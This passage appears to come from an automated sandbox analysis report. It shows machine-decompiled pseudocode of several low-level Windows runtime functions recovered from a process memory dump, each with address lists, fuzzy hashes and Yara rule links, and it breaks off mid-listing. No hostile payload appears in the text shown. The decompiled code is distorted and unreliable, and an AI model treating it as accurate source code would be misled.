Instruction Fuzzy Hash: F251AAB5E00615CFDB14CFA8C490AAEFBF5BB4A310F2481ABD555AF305DB30A945CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0343EF40, Relevance: .1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0343EF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E03429080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x77dfc21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E03422D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}

0x0343ef4b
0x0343ef4d
0x0343ef57
0x0343f0bd
0x0343f0c2
0x0343f0d2
0x0343f0d2
0x0343f0c2
0x0343ef5d
0x0343ef5f
0x0343ef67
0x0343ef6a
0x0343ef6d
0x0343ef74
0x0343ef7f
0x0343ef82
0x0343ef82
0x0343ef86
0x0343ef88
0x0343ef8c
0x0343ef8f
0x0343ef8f
0x0343ef8f
0x00000000
0x0343ef91
0x0343ef93
0x0343efc4
0x0343efc4
0x0343efc4
0x0343efca
0x0343efd0
0x0343f0a6
0x00000000
0x00000000
0x0343f0af
0x0348bb06
0x0348bb0a
0x0343f0b5
0x0343f0b5
0x0343f0b5
0x0343f0b5
0x00000000
0x0343efd6
0x0343efd9
0x0343f0de
0x0343f0e2
0x0343efdf
0x0343efdf
0x0343efdf
0x0343efe5
0x0348bafc
0x0348bafc
0x0343efe5
0x0343efeb
0x0343efed
0x0343f00f
0x0343f011
0x0343f01a
0x0343f01d
0x0343f021
0x0343f028
0x0343f029
0x0343f029
0x0343f02c
0x00000000
0x0343f02c
0x0343eff3
0x0343eff9
0x0343f0ea
0x0343f0ed
0x0343f0ef
0x00000000
0x0343f0ef
0x0343f003
0x0348bb12
0x0343f045
0x0343f049
0x0343f051
0x0343f09e
0x0343f0a0
0x0343f0a0
0x0343f09e
0x0343f053
0x0343f064
0x0343f064
0x0343f06b
0x0348bb1a
0x0348bb1a
0x0343f071
0x0343f071
0x0343f07d
0x0343f082
0x0343f08f
0x0343f08f
0x0343f009
0x0343f00d
0x00000000
0x0343f00d
0x0343efd0
0x0343ef97
0x0343efa5
0x0343efaa
0x00000000
0x0343efac
0x0343efac
0x0343efac
0x00000000
0x0343efb2
0x0343f036
0x0343f03a
0x0343f040
0x0343f090
0x00000000
0x0343f092
0x0343f042
0x00000000
0x0343f042
0x0343efb7
0x0343efb9
0x0343efbc
0x0343efb0
0x0343efb0
0x00000000
0x0343efbe
0x0343efbe
0x0343efc1
0x00000000
0x0343efc1
0x0343efbc
0x0343efaa
0x0343ef91

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction ID: b1435f3792a9cb2a70f90f226fdd77287bb0feadce76eba1c01e469a39e16625
Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction Fuzzy Hash: 7851F331E05249EFDB10CB68C1807EFFBB1AF4A314F1881AAD4559B381C3B5A9CAC745

Uniqueness

Uniqueness Score: -1.00%

Function 034F740D, Relevance: .1, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E034F740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E0347D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E0346F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L03444620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L03444620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E0346F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L03444620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}

0x034f740d
0x034f740d
0x034f7412
0x034f7413
0x034f7416
0x034f7418
0x034f741c
0x034f741f
0x034f7422
0x034f7422
0x034f7428
0x034f742a
0x034f742a
0x034f7451
0x034f7432
0x034f744f
0x034f744f
0x00000000
0x034f7434
0x034f7438
0x034f7443
0x034f7517
0x034f7517
0x034f751a
0x034f7535
0x034f7520
0x034f7527
0x034f752c
0x034f7531
0x034f7533
0x00000000
0x034f7533
0x00000000
0x034f7531
0x034f754b
0x034f754f
0x034f755c
0x034f755c
0x034f755f
0x034f7560
0x034f7561
0x034f7562
0x034f7563
0x034f7568
0x034f756a
0x034f756c
0x034f756d
0x034f756d
0x034f756f
0x034f7572
0x034f7574
0x034f7577
0x034f757c
0x034f757f
0x00000000
0x034f7551
0x034f7551
0x034f7551
0x034f7553
0x034f7553
0x034f7449
0x034f7449
0x034f744c
0x034f744c
0x00000000
0x034f744c
0x034f7443
0x034f750e
0x034f7514
0x034f7514
0x034f7455
0x034f7469
0x034f746d
0x00000000
0x034f7473
0x034f7473
0x034f7476
0x034f7480
0x034f7484
0x034f748e
0x034f7493
0x034f7493
0x034f7496
0x034f7499
0x034f74a1
0x034f74b1
0x034f74b5
0x00000000
0x034f74bb
0x034f74c1
0x034f74c1
0x034f74c4
0x034f74c5
0x034f74c6
0x034f74c7
0x034f74c8
0x034f74cd
0x00000000
0x034f74d3
0x034f74d3
0x034f74d6
0x034f74d8
0x034f74db
0x034f74dd
0x034f74e0
0x034f74e7
0x034f74ee
0x034f74ee
0x034f74f4
0x034f74f9
0x00000000
0x034f74fb
0x034f74fb
0x034f74fd
0x034f7500
0x034f7503
0x034f7505
0x034f7505
0x034f74f9
0x00000000
0x034f74cd
0x034f74b5
0x00000000

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction ID: 362151811f658e97d799dfba867dab10914b458259c56e8525b1d2984c99d36f
Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction Fuzzy Hash: BA51AF71600606EFDB15CF14C880A66FBB5FF45344F18C0BAEA089F211E375E946CB94

Uniqueness

Uniqueness Score: -1.00%

Function 03452990, Relevance: .1, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E03452990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x34fff00);
				E0347D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x3401664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E0346E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x3401668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E034A51BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x340166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E03452AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E03436600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E03452C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E0343EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E03452AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E03452C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E03452ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E0347D0D1(_t62);
				goto L28;
			}

0x03452990
0x03452992
0x03452997
0x034529a3
0x034529a6
0x034529ab
0x034529ad
0x034529b2
0x03495c80
0x034529b8
0x034529b8
0x034529bb
0x034529c0
0x034529c5
0x034529c6
0x034529c6
0x034529cb
0x00000000
0x00000000
0x034529cd
0x034529d0
0x034529d9
0x034529db
0x034529dd
0x03452a7f
0x03452a84
0x03452a87
0x03452a89
0x03495ca1
0x03495ca3
0x00000000
0x03452a8f
0x03452a8f
0x00000000
0x03452a8f
0x00000000
0x034529e3
0x034529e3
0x034529e3
0x00000000
0x034529e3
0x034529dd
0x00000000
0x034529db
0x034529e6
0x034529e9
0x034529eb
0x034529ed
0x034529f3
0x034529f5
0x034529f8
0x034529fa
0x03452a97
0x03452a9a
0x03452a9d
0x03452add
0x00000000
0x03452a9f
0x03452aa2
0x03452aa5
0x03452aa8
0x03452aab
0x03495cab
0x03495caf
0x03495cc5
0x03495cda
0x03495cdc
0x03495cdf
0x03495ce5
0x00000000
0x03495ceb
0x03495ced
0x03495cee
0x00000000
0x03495cee
0x03495cb1
0x03495cb4
0x03495cb9
0x03495cbb
0x00000000
0x03495cbd
0x03495cbd
0x00000000
0x03495cbd
0x03495cbb
0x03452ab1
0x03452ab1
0x03452ac4
0x03452ac6
0x03452ac6
0x00000000
0x03452ac6
0x03452aab
0x00000000
0x03452a00
0x03452a09
0x03452a0e
0x03452a21
0x03452a24
0x03452a35
0x03452a3a
0x03452a3d
0x03452a42
0x03452a59
0x03452a59
0x03452a5c
0x03452a5f
0x03452a5f
0x034529fa
0x034529f3
0x03452a64
0x03452a64
0x03452a6b
0x03452a6b
0x03452a6d
0x03452a72
0x00000000

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9226e57651702b4650785bd2e530c73906211c113b978a2b4e43a46f205d1194
Instruction ID: 594838c806d0704ca7ec2d750af46b55634f719ee25799e21eac4a1961b64b58
Opcode Fuzzy Hash: 9226e57651702b4650785bd2e530c73906211c113b978a2b4e43a46f205d1194
Instruction Fuzzy Hash: AA511175E002099FDF25CF55C880A9EBBB5BB48210F18845BF811AF221C3B59952CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 03454BAD, Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E03454BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x351d360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E0342CC50(_t86);
					L11:
					return E0346B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x3518504
				E03442280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E0346FA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E0346B0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L03444620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E0342CCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x3518504
								E0343FFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E03454F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}

0x03454bad
0x03454bbf
0x03454bc2
0x03454bc6
0x03454bcd
0x03454bd9
0x034967fe
0x03496800
0x03454ccc
0x03454ccd
0x03454cb7
0x03454cc9
0x03454cc9
0x03454bdf
0x03454be5
0x00000000
0x00000000
0x03454beb
0x03454bef
0x00000000
0x00000000
0x03454bf5
0x03454bf9
0x03454c06
0x03454c0b
0x03454c17
0x03454c1c
0x03454c1f
0x03454c25
0x03454c33
0x03454c3d
0x03454c40
0x03454c43
0x03454c47
0x03454c4d
0x03454c53
0x03454c54
0x03454c55
0x03454c56
0x03454c5b
0x03454c5c
0x03454c63
0x03454c6b
0x00000000
0x00000000
0x03496776
0x03496784
0x03496784
0x0349679f
0x034967a7
0x034967af
0x034967ce
0x00000000
0x034967b1
0x034967b7
0x034967b8
0x034967c1
0x034967d3
0x034967d9
0x034967dd
0x03454c94
0x03454c94
0x03454c98
0x03454c9c
0x03454ca3
0x034967f4
0x034967f4
0x03454cb5
0x00000000
0x00000000
0x00000000
0x00000000
0x03454cb5
0x03454c79
0x03454c7e
0x03454c89
0x03454c8b
0x03454c8f
0x03454c8f
0x00000000
0x03454c89
0x034967c3
0x00000000
0x034967c3
0x034967af
0x03454c73
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a291f8595dacdde0b6bb03b4604b20a85b6d774a39b2a60873171302a4c27935
Instruction ID: 5709fcccad75fee483668093cacc00d388e30cb5450f4d93002fbddf1b8f3289
Opcode Fuzzy Hash: a291f8595dacdde0b6bb03b4604b20a85b6d774a39b2a60873171302a4c27935
Instruction Fuzzy Hash: 43419435E002289FDF21DF65C940BAAB7B8AF45710F4600EBE908AF341D7749E85CB99

Uniqueness

Uniqueness Score: -1.00%

Function 03454D3B, Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E03454D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x351d360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E0346FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x3517bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E0346B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L03444620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E0342CCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E0346B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E0346F380(_t67 + 0xc, 0x3405138, 0x10) == 0) {
								 *0x35160d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E03454F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E03454E70(0x35186b0, 0x3455690, 0, 0) != 0) {
					_t46 = E0342CCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}

0x03454d3b
0x03454d4d
0x03454d53
0x03454d58
0x03454d65
0x03454d6c
0x03454d71
0x03454d77
0x03454d7f
0x03454d8c
0x03454d8e
0x03454dad
0x03454db0
0x03454db7
0x03454db8
0x03454db9
0x03454dba
0x03454dbb
0x03454dc1
0x03454dc8
0x03454dcc
0x03454dd5
0x03454dde
0x03454ddf
0x03454de0
0x03454de1
0x03454de6
0x03454de7
0x03454de9
0x03454df3
0x00000000
0x00000000
0x03496c7c
0x03496c8a
0x03496c8a
0x03496c9d
0x03496ca7
0x03496cac
0x03496cb2
0x03496cb9
0x00000000
0x03496cbf
0x03496cbf
0x00000000
0x03496cbf
0x03496cb9
0x03454dfb
0x03496ccf
0x03496cd3
0x03454e32
0x03454e39
0x03496ce0
